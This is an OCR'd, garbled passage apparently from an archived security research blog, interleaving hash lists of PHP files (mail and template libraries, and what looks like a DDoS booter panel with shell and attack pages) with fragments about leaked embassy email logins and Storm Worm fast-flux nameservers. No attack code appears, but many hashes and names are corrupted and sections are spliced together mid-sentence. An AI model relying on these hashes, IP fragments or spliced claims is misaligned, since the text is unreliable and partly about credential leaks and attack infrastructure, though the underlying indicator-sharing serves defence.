154571639385733989d4e0f55d3bbb02 
Logger.php 
ddf7b31394b83f05afd32d1f49b7f52e 
LoggerPlugin.php 
6e€a661428700964393a4be26a2e335d6 
PopBeforeSmtpPlugin.php 
c1744000b6161a666cb0746b089817ac 
Reporter.php 
5d5a28fe40b8941675bbb76bd4e352bd 
ReporterPlugin.php 
fOf800b46c35dfc92d563f053969d934 
Sleeper.php 
f633cf580c8c737863537e35763a3cef 
ThrottlerPlugin.php 
f10688e346e6b867925bd17267a06d2a 
Timer.php 
2b9540de8a3b6862bd444464e21781d3 
Replacements.php 
e€4779acb2a5162043ac2fe99d4967c97 
ArrayLogger.php 
f497d196552071617eeb7f2e8696e9ef 
EchoLogger.php 
5e43cdf990dc905d715281f3c6e5b0b1 
Pop3Connection.php 
27f57d60cf68a4d01d15b8acb7a752eb 
Pop3Exception.php 
dbfd898b3f49890e7874d0b143968097 
HitReporter.php 
6bb943964554965c57f3426bf81791bb 
HtmlReporter.php 
b3e7aebe0520e08867931435c6271c11 
ByteArrayReplacementFilter.php 
1f3117b8035475c7fof493cdc033d2ba 
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StringReplacementFilter.php 
cbffae98e3fl3ee9d6a2adb2b1caf310 
StringReplacementFilterFactory.php 
2ffd572f4aa42a6ff10b70b79fb0632c 
AbstractSmtpTransport.php 
2b86a69d809faff635f1e67909947b7b 
EsmtpHandler.php 
d2f4637e84b9a98f8307a334f1f786e5 
EsmtpTransport.php 
08f5229855b8cf557683d0d5172667a7 
FailoverTransport.php 
262f0e7da82071ca9812a5a846bfc820 
loBuffer.php 
Offf3ebd8aa57044129b4b0f113d38a2 
LoadBalancedTransport.php 
1de35b49d4a9492a9a59f28cdf22591a 
Maillnvoker.php 
50227289bd1679756510587d7e98cbf9 
MailTransport.php 
6bb0867ce2bd063b3f78e9e68d4963e7 
SendmailTransport.php 
f95c8a0779a8ceafbfe822753deblc7a 
SimpleMaillnvoker.php 
d459e3d74018ca71012a3adb3d7f77ad 
SmtpAgent.php 
2cc78d77e5945af9bbaac51207ceef4d 
StreamBuffer.php 
6d34cf65700bcdfb86fd45426e571801 
Authenticator.php 
c2070e26e782cb6aca803bffaec8096a2 
AuthHandler.php 
b59ffc92640bcc49a9619635b764aa21 
CramMd5Authenticator.php 
68ff2a71656ace9bc54843c1b106d8b6 
LoginAuthenticator.php 
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File size: 118784 bytes 
MD5: 94c642903318f89d410c64d46f2047aa 


SHA1: b834cd34283e541dccb5aad81fb49ca9 7adbb48c 


1. http: //blog.spywareguide.com/2007/09/compromised_emails_lead_to_ie.htm 
2. http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065427 .htm 


3. http://malware.com/ 
4. http://online.securityfocus.com/bid/554 


3.9.3 Login Details for Foreign Embassies in the Wild (2007-09-04 23:49) 


Uzbekistan Consulate in 

Uzbekistan Consulate in German 6 
Uzbekistan Consulate in India 57.66.15 
Uzbekistan Consulate in New York 57.6 
Uzbekistan Consulate in South Korea 5 
Uzbekistan Consulate in US4 57,66,151 


sin Afghanistan 57. 
in Afghanistan 57. 
n Belgium 57.66.: 
in China 57.66.15 
in Dubai 5 
In France 5? 
y in Germany 66 
¥ In Indonesia 57.6 


Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 


Uzbe Emba 

Uzbe Emba in Israel 57.66.15 
Uzbekistan Emba in Japan 57,66.15 
Uzbekistan Emba n Kuwait 57.66.15 


Uzbe Emba 
Uzbekis 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 
Uzbekistan Emba 


in Saudi Arabia 57 
in South Korea 57 
in Thailand 57.66, 


Emba in The Netherland 
Emba in Turkey 57.66.1 
Emba in Turkey 57.66.1 
Emba in Turkmenistan 5 


[3]full disclosure style : 


"Here is a list with working passwords to exactly 100 email-accounts to Embassies and Gov- 
ernments around the world. Yes it’s the real deal and still working when we are posting this. 
So why in the world would anyone publish this kind of information? Because seriously, I’m not 
going to call the president of Iran and tell him that | got access to all their embassies. I’m 
DEranged, not suicidal! He has bombs and stuff..." 


The researcher’s main motivation behind releasing these is that there’s no point in contacting 
the email owners directly as no one would take his emails seriously enought and change them, 
so by going full disclosure it would prompt the embassies in question to change the passwords. 
Dan Egerstad may be quite right, at least on the passwords changing issue. Could these email 
accounts be accessed globally and if yes why? For instance, could Uzbekistan’s embassy in 
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fe80233a34d219d78b76b0b0f8a589f0 
PlainAuthenticator.php 
8881562036edd9aadb9031e21bbfd54e 
cache _deps.php 
aofa332ec08a3b1f74bcfc841a884246 
mime _deps.php 
7126dd9fb21316415f6171ab530533bd 
transport deps.php 
e€99797e55516f3b817c3867c89b00d3a 
blank.png 
07959b828991203fad873a67aa69ba50 
TimedAttacks.php 
35b31174ee0923479c93520c0fc7e2a5 
admin.php 
fe8254745a5145b97821e61211a2fffe 
admin _shells.php 
7f450bc34fe3a34146efb828bf382cac 
admin shell export.php 
ebf2da58866442481937f32013d32588 
admin _users.php 
e18a79a8fab4e944a3f8af3b1b7cfees 
admin user _popup.php 
5e40af28d32795b61054f1270flbc41d 
bg.png 
7df38d40ccleedaad06923d2aebf2766 
booterpower.txt 
f899139df5e1059396431415e770c6dd 
chatbox.php 
f14571bcb1d0a132003e8c2e2e064582 
checkmark.png 
59bb8d12db45d8c42e366d0980be31ee 
config.php 
a73435f6168653f26a7e40307dc403fa 
delete.gif 
f69444ee1b8db4ab8fa58515da4b1340 
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edit.png 65642299721db0b5eb029ae8fcb13ab4 
flpower.txt 
f899139df5e1059396431415e770c6dd 
idocs.php 
5ca72ffel7d233cf2b058f56d7b5ac2b 
image _blue.php 
6eca6a0282642cd1d50e6e163b6eb75c 
image _green.php 
a3b488db464f49eef9894ebedb9152ee 
image _red.php 
482d9e8861d45b81e17e75d172830de0 
image _yellow.php 
4319741457albb8aece0029ccflab7f5 
index.php 
2dad05d1a03b2e78d47cc8db041e9ed1 
ipn.php 
c7fb8f9afe96d13879b1432d00e0b7bc 
lock.gif 4e5533c83b4b853908ee0b523737ebel 
logo.png 4a58b3c019f0c1b367fdd3c54be11f00 
member.php 
a198d7cde7780fb6ffaa3dd1bb7df954 
myattacks.php 
df94206dfla5c864acb5ebc228ff5936 
notepad.php 
1673344a2fe55a654da0797f2a464ffd 
notepad.png 
4505c89afad09099b69d6c9be897b1F1 
privacy _policy.php 
f8b9188ae9d2709535b9306ee47744f9 
purchase.php 
fc2590c7badee663b31f93b7c5d0525f 
style.css 
72e80cfdfbaccbh3f4ac254936ef846e6 
takedown.php 
a2a2cb3c73e6f6837a997f5df7799959 
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terms _of _service.php 
8095e302a64acc8f1lb0af74e238fbba7 
thankyou.php 
3b5cacb169a6747280fda4b2bce3cO1f 
top-bg.png 
d21583dc091d396efe26671163aaad4b 
transbg.png 
b8f4341163dbdbb3c4bdc43861b6b07d 
transbgtab.png 
1lbb6cf142b627160439c87b99cc15997 
transbgtabh.png 
0f4184dbbc5c08cd79ebeeledc17f4ba 
ucp.php 
3dad3256a5169dc10a5c8e58471b7ac5 
mangogua _main.sql 
9d036810370b483774b2f8ce3031b1cd 
attacks.php 
aff45e6d511c83aa283d75c6bf391bbe 
cfr.php 
5ae54a6/7c3b125b01lef7leef27249a6f 
don.php 
03231bd05bb72ddab03be83156a27517 
enemys.php 
9ef7846398abbdbbaf6783fldala53cf 
friends.php 
a0e95e9b058eed07671d853885b5f112 
funny.php 
153b46759ad51bf8d5424b2adfc58074 
header.php 
f7c9a11736084e3ee0832f16936f4b80 
hub.php 
18b65c3fbc44f6lde5a6b5a77ccc1956 
index.php 
efc243c0012e34abfc950f2b2a44e6d0 
install.php 
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0854b036e667a4785b9d879aea074ecd 

ip logger.php 
ad429f3f3e0e5200f9f53a6184573ed0 
login-exec. php 
a5a967333238fcd3d38f2247bd9bd9d4 
login.php 
52df47dc9b393114bf998bce22e646d6 
logout.php 
a5a83ef3b393a059ad8cf756b3dab5ab 
profile.php 
7228d47df665febb097f662cf6cfOca8 

reg.php 
6866bd1437ae797e74e9b1b4222fd2dc 
register.php 
dfff235dcf4c98cbd35d0d3c2cfc88a3 
reseller.php 
ef14e5fdcf4a304fb88f33e458374e25 

add.php 
f0d87ba2a2870607b0e24755818e21ea 
blacklist.php 
9a91309bcf55d638ffd057b71bcfeal3 
header.php 
1564067efee8be0ad56d2db582a72ef0 
logs.php 4cOfb30107baf8e76fe71118be5598fd 
news.php c9f4152ed97b5bff345c8f526b8934a5 
shells.php 
80675c69e9dd8bbc02db0c76feaf2f81 
support.php 
7dacbfd30aadbd6133acd00c70aa968f 
users.php 
3a2aa6029407ecbf03a4914b30b716dd 
view.php a5419a161879ba71bf06d9b1797a7c8a 
auth.php 4d80f9b6df9da50ef3962eb7f5a8c7 74 
config.php 
a94ddca0a83260cb36d2f625d61147b5 
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debug.tpl 
98a94f077d2453138d657cf226051e95 
Smarty.class.php 
c418baef968c31083258d364a44727c0 
SmartyBC.class.php 
5734f7d205e8217c6c53c96fea2a8be3 
block.textformat.php 
3617722d1d24099e712b89b15ef3f9d2 
function.counter.php 
95d9f4a7de57872c3946463948cb01f6 
function.cycle.php 
bf71dfcaf7676619cc0526f327022035 
function.fetch.php 
7d6c587eded457030cf6215blceda9e7 
function.html _checkboxes.php 
a92d04b43b0f88529af8e127df3c074a 
function.html _image.php 
44ce90ae82fbb042febe414a83e7e541 
function.html _options.php 
76652be3d321e6089bb6a3b19401b02c 
function.html _radios.php 
€d934b586d1957bbabbb9230d7b81328 
function.html select date.php 
a637ac29790c3a851682a86840f363d4 
function.html select _time.php 
4f7fccd8595d5211958c7123ee82c98a 
function.html _table.php 
172491d13ad37f0b82de821758b21dd2 
function.mailto.php 
688de6be86911509c038b6719ea00207 
function.math.php 
0b891f2679f8b1d275e2e3f53489fde5 
modifier.capitalize.php 
3c547dde36e8dba58615593e66d83421 


modifier.date format.php 
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f7f23fe9694e7f364d98451fac3f8916 
modifier.debug _print_var.php 
62200393fd598016767e97844236a636 
modifier.escape.php 
426a494511d56a7528acb26cf0016418 
modifier.regex _replace.php 
21bb39afalb7fd6de675e554b5e43143 
modifier.replace.php 

£82 70ab6f2d3d8eb695192e4e83da0c9 
modifier.spacify.php 
f9ed4a1782aefe0a248fb3a4cd384b67 
modifier.truncate.php 
202d2f3d351a514e68278933bf38fed3 
modifiercompiler.cat.php 
ea240a56cdf2a6ba96e7 7dd3b11c9d2a 
modifiercompiler.count _characters.php 
a098260b037336c38e9a968a24eflafO 
modifiercompiler.count _paragraphs.php 
bd26736080dcabee8fla7aabf21d0b00 
modifiercompiler.count _sentences.php 
1bfle2101c791f52590c1a730b5457de 
modifiercompiler.count _words.php 
5b7d5fc764088e0e311891571aab765d 
modifiercompiler.default.php 
d72bbffe79f92d04af143c36ede00d8d 
modifiercompiler.escape.php 
138dad0cacf3cfdb301bb7b2b640627a 
modifiercompiler.from _charset.php 
58f6df002c37a675627dc2b54680ad69 
modifiercompiler.indent.php 
f329df84ba10c052f4f50022facd6f9d 
modifiercompiler.lower.php 
dbfbf8481ealfbb957b24c668950d764 
modifiercompiler.noprint.php 
33451b823afdfe8271c402cdabf61d57 
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modifiercompiler.string _format.php 
f610c9fb402d248c025369295b276bcb 
modifiercompiler.strip.php 
8e9ebc83db0535d93d05ecb207a06elf 
modifiercompiler.strip tags.php 
bdf3af4b31f661477f7f168bcf1l6bc45 
modifiercompiler.to _charset.php 
6b1c512dd3856f10a83a361labee25362 
modifiercompiler.unescape.php 
59ad568fe58a28454becd4d7d107b143 
modifiercompiler.upper.php 
15cda038b7ce9950d0cc4c930334adf3 
modifiercompiler.wordwrap.php 
000f15f863125c3600cdfc8d1df3fed7 
outputfilter.trimwhitespace.php 
9d32d6eea2817433c313b66541ffaa31 
shared.escape special chars.php 
fe3f159fle6c044f871a94e7d8cb2ad8 
shared.literal compiler _param.php 
b58133b86971c14412d8413753187057 
shared.make _timestamp.php 
€340857831b985f96412639486ca6bf1 
shared.mb _str_replace.php 
00ad04ec798345c9da214d4eaelc8ba5 
shared.mb _unicode.php 
€33a704313f3200eb17bf91f4ae6c893 
shared.mb _wordwrap.php 
c75cc8402ca9afa6d5c5e42d9af1b039 
variablefilter.htmispecialchars.php 
06361b7471df67d9801ba2a4c1b2c61f 
smarty _cacheresource.php 
2c59e77ca763deec50d3df6a474ba56e 
smarty _cacheresource _custom.php 
30a9c1480db001fd4a3a7c80e7dc5al5 


smarty _cacheresource _keyvaluestore.php 
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c2fb3e1b6a45c9d095c3elb8aa08eed7 
smarty _config source.php 
ffabal159a9b9295d625463529cb97e4b 
smarty internal cacheresource _file.php 
14d61f4c108f3969af138333358e2ba4 
smarty _internal compilebase.php 
3d702028ec4c6da241089a03bff21f35 
smarty _internal compile _append.php 
fd7 lacfc5c29f7e2d006f993da663282 
smarty _internal compile _assign.php 
9eb25a7ebf07f68434c2578f641295d7 
smarty _internal compile _block.php 
401d20928bf89b14c5fa27e444a54515 
smarty internal compile break.php 
4670ea85f8d6c28abacc1b643591008d 
smarty _internal compile _call.php 
a8cadf2371b55a19df886564f6fd38b5 
smarty _internal compile capture.php 
c554049d043ac4153alb2f7d1b9e03d7 
smarty _internal compile config load.php 
1e825ed2e87e3a3b13fdeQabebb5bf25 
smarty _internal compile continue.php 
6e4051e804122cce52c9flfa85acabc5 
smarty internal compile debug.php 
9d9de7480cc8b1db09b499746a03f626 
smarty internal compile eval.php 
bd94ce97541001366b480793896def3e 
smarty _internal compile _extends.php 
1d5af2e98529bb04854628b74b9a5d2c 
smarty _internal compile _for.php 
e3d5ae048127268304e498e2f8a5915a 
smarty _internal compile foreach.php 
559a83858780818d67930de06f2121bb 
smarty _internal compile _function.php 
a084a3a078a64aa93cb6ec395fb42123 
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smarty internal compile _if.php 
6af854504afba39fa0aed452de0036c9 
smarty internal compile _include.php 
a86958d231521c4a73eb921bb66b6ff9 
smarty internal compile include _php.php 
50a88eb174e0427f6edfbd904e5af08c 
smarty internal compile _insert.php 
b4daff7b0c97e643ab15e4a15f20b274 
smarty internal compile Idelim.php 
b60cb0ce76c23b2f7e3a2cf5dd4c3137 
smarty internal compile nocache.php 
69a46fc75b04eb964be159aa7e54647F 
smarty internal compile private block _plugin.php 
79014775c7cc64452e44alef14121626 
smarty internal compile private function _plugin.php 
ebacfa8d7fe15f32a44e0a8ab71bea63 
smarty internal compile private modifier.php 
ce4d8bee71f87b298a2187229c46e8c3 
smarty _internal compile private object block _function.php 
54bb13f2e9587fa2ac24a3c04ba48bd6 
smarty internal compile private object function.php 
8fd66a8f2ae3d20b03f10f66e36a3995 
smarty internal compile private print expression.php 
91¢12f055117d35a8cc72b412eed9099 
smarty internal compile private registered _block.php 
79fdd5de62ab820c10ab14a9437f69bf 
smarty internal compile private registered function.php 
e1b54ebd4683180c6d0846e9cfaf7e29 
smarty internal compile private special variable.php 
3212b4491280100b70180dad3031bc4d 
smarty internal compile _rdelim.php 
e0ad02a506e0b44f956c14d291e329c3 
smarty internal compile section.php 
f52e128ee2f15a355b3207287763c00c 
smarty internal compile _setfilter.php 
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7187949d5e69602674612566b801050e 
smarty _internal compile _while.php 
69000a5d77d53d406cbdc7e3d317aa51 
smarty _internal _config.php 
2b1d37c3a622f6d70d07513907e6a442 
smarty _internal configfilelexer.php 
77de7b21e041b8190d912ebeb6ca72e9 
smarty internal configfileparser.php 
476fdcle62dc94e12a4cfc8e23dbf336 
smarty internal config file compiler.php 
ed648487b57c657089be98eac7ea94al 
smarty internal data.php 
Obe378cac66bae8bc28e3eb305f369de 
smarty _internal debug.php 
95fb21bdb36386c711c7ce2024841a71 
smarty _internal filter _handler.php 
0f826812544232e25132593a203ef59d 
smarty _internal function call handler.php 
666ac04e7ff49fd065926b35418513eb 
smarty internal get include path.php 
6d57f412bdb9ed346324b5a0f9bc632F 
smarty _internal nocache _insert.php 
6e94e24717edab0bf3dd12c65752364b 
smarty internal _parsetree.php 
bd56249369096911858e70d0ed7ce6bd 
smarty _internal resource _eval.php 
67aa045f646794349a17c4ec4dfa2f0d 
smarty _internal resource _extends.php 
b0lefc9b7bbbdad22d8110c07ca0447a 
smarty _internal resource _file.php 
€19b25703f5209ad1c094fa21d0b71e4 
smarty _internal resource _php.php 
d719177ec017f38ebd07b58464e12de4 
smarty _internal resource _registered.php 
6683b9b10540c23132a0b064cdb0d5df 
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London successfully login into Uzbekistan’s embassy in Moscow, and even worse, could a host 
not belonging to the embassy’s network access these mailboxes for flexibility? If yes, there’re 
way too many ways this data could have been obtained. While going through the accounting 
data, we could both confirm that best practices for strong passwords are place at some em- 
bassies, and also question the lack of such best practices at certain ones, a security measure 
that works against brute forcing attempts, but is totally irrelevant when it comes to keylogging 
and sniffing. 


Many people would logically consider the possibility of abusing these login details by obtaining 
the content of the mailboxes. However, another perspective worth keeping in mind is the use 
of this login data as the foundation for targeted attacks on a embassy-to-embassy basis, the 
way we’ve seen it happen before. 


1. http://www.theregister.co.uk/2007/08/31/embassy_email_accounts_exposed/ 
2. http: //www.vnunet .com/vnunet /news/2197772/embassy-email-details-posted 
3. 


ttp://209.85.135.104/search?q=cache: 5ejIfiNckz0J:derangedsecurity.com/deranged-gives-you-100-passwords- 


o- government s-embassies- 2/+derangedsecurity.com/derange 
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smarty _internal resource _stream.php 
6baa79d3fa9b71f4fba50797d13a01b1 
smarty _internal resource _string.php 
d262867cccb0087b77b550a76f481007 


smarty internal smartytemplatecompiler.php 


3e206c623d5539cf62166424387f470b 
smarty internal template.php 
b38a1358a41f73c3432a4301c7dfd072 
smarty internal templatebase.php 
3cc63cab45dc7d6c75657f2bb708f054 


smarty internal templatecompilerbase.php 


479db331048763eb441ec704b68c3661 
smarty internal templatelexer.php 
e2cc74lacbba49b6fdcc62foeeeaf9e5 
smarty internal templateparser.php 
8a0f983b72083af6efce91b491a0867b 
smarty internal _utility.php 
8f8432aa6eacd7e9cb6ee327d9bfc889e 
smarty _internal write _file.php 
83926a910c35130b2881cbe8c61bb0e8 
smarty _resource.php 
6cb36db4ael1a67ae786b186cfab33195 
smarty _resource custom.php 
831726e7553a1b53bb2fc3288e38342a 
smarty _resource _recompiled.php 
8ad5de73dbe35d0b8d304bde138e015c 
smarty _resource uncompiled.php 
811297e519643b4342f78aa19b681555 
smarty _security.php 
5840eldd8debefd38bd1392632f6d1c0 
class.add.tpl 
2014c8ce992a5cc38a7dbaf071fe4145 
class.admin-header.tpl 
72c741caa643d8ff91leb01e7cOb4f5ac 
class.blacklist.tpl 
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dabf284de23d185aa4599c105d848007 
class.cfr.tpl 
84bb7e3997978973c46a78del14f3808b 
class.don.tpl 
efad9a1d5156ad12ce6728c2b6c2f981 
class.enemys.tpl 
d6dbd99753b68f78aldabe12b5718276 
class.footer.tpl 
abc9a70ba461083532cd4d23c2dellcc 
class.friends.tpl 
65af60e7b53b36b076dff363af30af7c 
class.header.tpl 
9e26c779ad8802bafdc2fdc13f78827c 
class.hub.tpl 
13d5bf89e2ddd16280e446c21d356a09 
class.index.tpl 
e€1a9862685b0275cdd20f93fbbf0029b 
class.install.tpl 
e7221aae5cc1b0c562cce00174c04182 
class.log.tpl 
45e404cce09d47ef941682c53eb59058 
class.logger.tpl 
48848a3f75d71bd17752092d153ee10b 
class.login.tpl 
81b956cc446726f1c2df75158c9e7332 
class.logs.tpl 
bea8a0acd172909a474ba8b646b2769a 
class.news.tpl 
829f2c469039a00972ba7e4d84e0fc3c 
class.profile.tpl 
b96acdd94797eb10c9be83d3c36e8d89 
class.register.tpl 
50f9cf00fd418518a0a581cc96b7fa56 
class.reseller.tpl 
6fe35f50c5aal16a407afal2981b6b9f1 
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class.shells.tpl 
14f3cc336165b9343c9a9c015e7d6f29 
class.support.tpl 
a5b38770c240638dd04aea8904c08852 
class.users.tpl 
818ab75a00a7365a2e6467778e07644f 
class.view.tpl 
232462d4a66739eee1109c09e6704b4a 
datatables.css 
6105cc72ffb02f971c84a9409cc39010 
forms-btn.css 
leba2184aelfcal6eafe28b19ef57a69 
forms.css 
d0c2ac4297c815c66f666575b1922203 
fullcalendar.css 
2c¢148ce134ea40905e7b02ad78d7f0c7 
handheld.css 
48c60bb3c0cda589ac66793efdddc6e3 


menu.css f6c7b66b3b9f90dd79c01a2d235cf641 


modalwindow.css 
f3e340504f2c70e05b33cdf98c991cfc 
pirebox.css 
beee8c465f96bfea2314751d0f5464ad 
statics.css 
ae197f897a994ca52b4d134b2857bc6f 
style.css 
eb031226ba45feb0928ef13b6e44c446 
style _text.css 
df24831a231d9ad7480cc6a7c4d4334c 
system-message.css 
fdb73696918d9068504a8810a9211218 
tabs-toggle.css 
5b3930ffdbff9891efef3fo69f82f117 
tooltip.css 
3fe2eef840d14edb9480be64ea2b2450 
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wizard.css 
0c294134c7a9bf4e7257b889d5ae7288 
wysiwyg-editor.css 
7743f3cc47b784b4d7c6f7ff7df98e35 
wysiwyg.css 
f6517c84d14a75151lae3d4e12d5f13c3 
wysiwyg.modal.css 
a5151c4945487c3d825e703dc5330a83 
back-footer.gif 
61dadc7d12fe6cOcO0f36a1c624f815ae 
back-spinners.gif 
0f569197ffad7e6fala77cfd959a6e0c 
background.gif 
8e09066feffe71280a5218b22ac37061 
box-hide.png 
1d9cd75d211578162a688974aa6faf37 
box-shadow.gif 
093d10cdd9a9aGf2c2aab5751ec41f48 
box-title. gif 
1ae3287702a79017b23f836153de4a74 
breadcrumb-home.gif 
fd2b5ba7354c5b5e5aa0d63121a37cc5 
breadcrumb.png 
395b5fb0810923b7bbcd913f525c91db 
browse. gif 
b56afe110ab8c3a563753ae9b83d25fd 
btn-box-small.gif 
44fe7baa53a8c615224ef0al36b0b53f 
btn-box-text.gif 
3722ef085ff28b1e91c6d8c32724ae0e 
btn-box.gif 
09d17452fa5db1e4765def593eb3c6c8 
btn-info.gif 
a2e508f9b4327614a0a30d78b0e210b8 
btn-menu.png 
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26b1lace51d6fb43577f79b72497d66e9 
btn-search.gif 
cf1907634245b497f83effab02f2cf07 
checkbox. gif 
c069f20bb158758eb54feaff8ecfb3c3 
datepicker.gif 
e15abdd2a71cf381d51f0a278a39f617 
forms-btn.gif 
c7f6c19123ed758ac21ec8445b582e4b 
icon-error.png 
c6leaf1c3d994ad58f700ebb7c3ead1ic 
icon-info.png 
0099c9e869285107cfd3b9a350ad9c81 
icon-Submenu-on.gif 
fofldcbe158b4aac4754805c31761038 
icon-submenu.gif 
aldd5f7455a59098e2ae9b0482f50598 
icon-succes.png 
d3ald23eee3falle559aadcabb13a115 
icon-warning.png 
a6253ec16e9ff740a44d1c0751666a17 
input-back.gif 
4491f72015e2f341b029fec24ee8c989 
jquery.wysiwyg.gif 
b15d7806619d728db6c275f6d33e6e4a 
labels-bar.png 
56fd5a24c1290b8780d60e72e43e95d5 
labels.png 
c12e08b5f133ad75cd3ac3efeefa3219 
left-grip.png 
d22f9dfachedeo4fbfbab31c8900e5fa 
list-arrow. gif 
c57972b90be9d46d3b7fe259560delal 
list-plus. gif 
2f70cb7ef199f0a50dc9d2252238fb79 
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list-square.gif 
8eb84b76ad7aedf93dffa531f8fedife 
list-tick. gif 
470ba6cd1e3563b4e30df8caf490ee03 
logo.png 1314e5c7cbea972f6113cbdb6212130a 
main-left.png 
1462125f643771fd55f75b1717151844 
menu-current.gif 
€97581b209e5b7ba046999efbf07a039 
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config.php 
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ea22501a2c9556bb671158231ef29cae 
index.php 
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a7ed9729fcbcea4b3703e7024b519da3 
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3.9.4 Storm Worm’s Fast Flux Networks (2007-09-05 14:18) 


vw 


Following my previous posts on "[1]Storm Worm Malware Back in the Game" and "[2]Storm 
Worm’s use of Dropped Domains", here are some handy graphs of Storm Worm’s use of 
fast-flux networks generated during the last several hours, acting as great examples of how 
diverse [3]malware C &C has become. 
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excanvas.min.js 
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ns6.bnably.com 
ns5.bnably.com 


ns4.bnably.com 
ns3.bnably.com 
ns2.bnably.com 
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Domain servers in listed order: 
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FailoverTransport.php 
0658017ae6bf39dc0f19fc44f9239612 
FileStream.php 
1b9b5cldcb4f59fa8dda8c29459dc362 
Filterable.php 
9fb967c9b436c2c1a946294de31002b3 
Image.php 
5d1688cb259abf2a519adb6d7622ce97 
InputByteStream.php 
2ed26b5cbdda5e19f596c5cO0ac39f9ba 
loException.php 
2d285ef7a36ded97df33085ebdflaa9e 
KeyCache.php 
95add12fe2e6b5fc5b2d0dd9501b0808 
LoadBalancedTransport.php 
a539ef8fc872136fal0a5la9ea2aab22 
Mailer.php 
f95671le8aec00e7abe9c953f16f03f50 
MailTransport.php 
63bd85e811cda278ee8d1c97ff65353a 
Message.php 
c79a1235baa9115e52f2e353d49f4eb9 
MimePart.php 
f551c7af62eb28295e76a412986995cf 
OutputByteStream.php 
a8762f1dd74052b9f78da7383c6ada75 
Preferences.php 
094ef1e878a847elecfbf8a8a3df3d73 
ReplacementFilterFactory.php 
c59fb2f7a9b756bb3d59f34f3dcea4f5 
RfcComplianceException.php 
Oeb0ed1e7300472f15aa58fla22e3d21 
SendmailTransport.php 
acb543240912bff240b017107a01e5c0 
SmtpTransport.php 
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4dd0591ecd766fe5fe9b28b8c6f854f2 
StreamFilter.php 
e09d5e50f1f9d993155d66c0fb279e5f 
SwiftException.php 
a1c395272d9eaf369b6355b770f845d5 
Transport.php 
79bbfaee96ce06e8f84cal597b0beb55 
TransportException.php 
41927c5ff50e672ef43623ed9427a736 
AbstractFilterablelnputStream.php 
83cec31lad80d53beb3e6ea3f6c5a173b 
ArrayByteStream.php 
2b6514e91f80db8db7ed95fld14efe22f 
FileByteStream.php 
48clae069ae90d8a0c6105e8Ff2808d42 
GenericFixedWidthReader.php 
f8be36flaf132ac2335ae8dfb0187a13 
UsAsciiReader.php 
46cfc3612378acOb2dcbOcfb31d240f3 
Utf8Reader.php 
853300e9a8e119a80del2a78c2be90d8 
SimpleCharacterReaderFactory.php 
543ecee4bf901f15727a08d327fa7a53 
ArrayCharacterStream.php 
b9d3e7d8af75256ccacl05dcce0feb23 
NgCharacterStream.php 
83a0d6db389d3f7495803a359a238f62 
Base64Encoder.php 
ee09d623fe668f2622f3cd2395474784 
QpEncoder.php 
895c91c599357dad2edc5475998640a7 
Rfc2231Encoder.php 
0979925cd5f697cae6a8d23d1891941f 
CommandEvent.php 
b6d268e48993e640b8170c5fid4ef3dd 
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CommandListener.php 
7d2028d4475cc54dba40821ce0ad9c94 
Event.php 
9d86fbd806b027a51ed5176cOcb80ed0 
EventDispatcher.php 
742f318bcb4ff73474757b40a7986a43 
EventListener.php 
f37fbefb51ffe29a0e5ee59315dc40cd 
EventObject.php 
417eb03a85ab8252a6fled6b8801f211 
ResponseEvent.php 
647dc2fa89cb025261b21d9db0e44ff8 
ResponseListener.php 
a8344e80df5c2e32c58454431d4c4bbc 
SendEvent.php 
0435e824b33b35eae12072202f89edd1 
SendListener.php 
34a660b59207e523f0f8684c75fbc38b 
SimpleEventDispatcher.php 
a590da09d93e627daf89809bc74fb111 
TransportChangeEvent.php 
00566df6f19077e03a385ec39b909f64 
TransportChangeListener.php 
d2702487e1313d7aeed746d0bccc433f 
TransportExceptionEvent.php 
de65dd4e09654ae4bc846f378a3a0ec1 
TransportExceptionListener.php 

6cfoc5 75f6é8efbc4f963d6b62dc0105d 
ArrayKeyCache.php 
58d8dff94026628e66103a5877b306f9 
DiskKeyCache.php 
2b5f3ecad8c21f6fea9d2ff676c50462 
KeyCachelnputStream.php 
25a9178a9e8b03c064dcee12de412f48 
NullkKeyCache.php 
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c5c611f36b9019832d25219616e735cf 
SimpleKeyCachelnputStream.php 
6dbd4027286040bfc14e97274ccee201 
ArrayRecipientiterator.php 
8568a84c90c7 7afd5b78ea437739774b 
Recipientiterator.php 
4ab937ace8b96018082d7006b659e62a 
Attachment.php 
c67916ccb0c56598dc5942ebb0e9d6e3 
CharsetObserver.php 
b56c52eab5381clebbc6f3eel111ba57b 
ContentEncoder.php 
aa86da6f82081a9e6c482494cdd7e543 
EmbeddedFile.php 
f4a500239bba0470ee23b1646adeffld 
EncodingObserver.php 
5363e032fafb1de485e07da227511e14 
Header.php 
fd8fb12cabdc394e9901874009a0b3c1 
HeaderEncoder.php 
63b5e6dab187b40d69f2f1e4269bf9cd 
HeaderFactory.php 
36924acd27292275b5ea7740d08044eb 
HeaderSet.php 
025b5c3ae0297875caf94ddcf30dd62a 
Message.php 
7244b3c2e705f51c6ff9c3e5705698da 
MimeEntity.php 
ceel3c885efaeb070c131led9eef42098 
MimePart. php 
09294fba7b083cbca42c369f53f7cead 
ParameterizedHeader.php 
216d078a8c926a09db760237e4f34f7e 
SimpleHeaderFactory.php 
96efOfObbb50dc923e01eac8b275c971 
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SimpleHeaderSet.php 
clde5dcde0630c5a69382a87dfff4a99 
SimpleMessage.php 
d0efa2984b7cb9da7d5aa47139d18465 
SimpleMimeEntity.php 
58a8cf9364f2a551d4760d9685c08203 
Base64ContentEncoder.php 
817dcc6fabfc42132217485198b5fd65 
PlainContentEncoder.php 
84fb029357e7f92eb97735cfa6260290 
QpContentEncoder.php 
50a6d21587b5d2bcf3c4eafd9d0f8e47 
Base64HeaderEncoder.php 
b96543098037eff20264984176ef0526 
QpHeaderEncoder.php 
46ce9b34de8414a1e7225f372824ab0a 
AbstractHeader.php 
ce899eal2be733a719cdb9dcb458e3e0 
DateHeader.php 
b11e51969e361351006edb73920fdb6d 
IdentificationHeader.php 
ced4f55fe365481702690916c94e4a6f 
MailboxHeader.php 
9232c3d5d9617fbc62dcd94ef1181fd3 
ParameterizedHeader. php 
fe0603f1bc575dc45c2d3f215cc61710 
PathHeader.php 
5d868eac0fa55a2878f1d80f49fb59a5 
UnstructuredHeader.php 
c49032ddd48852bb048c4ec47c7b0657 
AntiFloodPlugin.php 
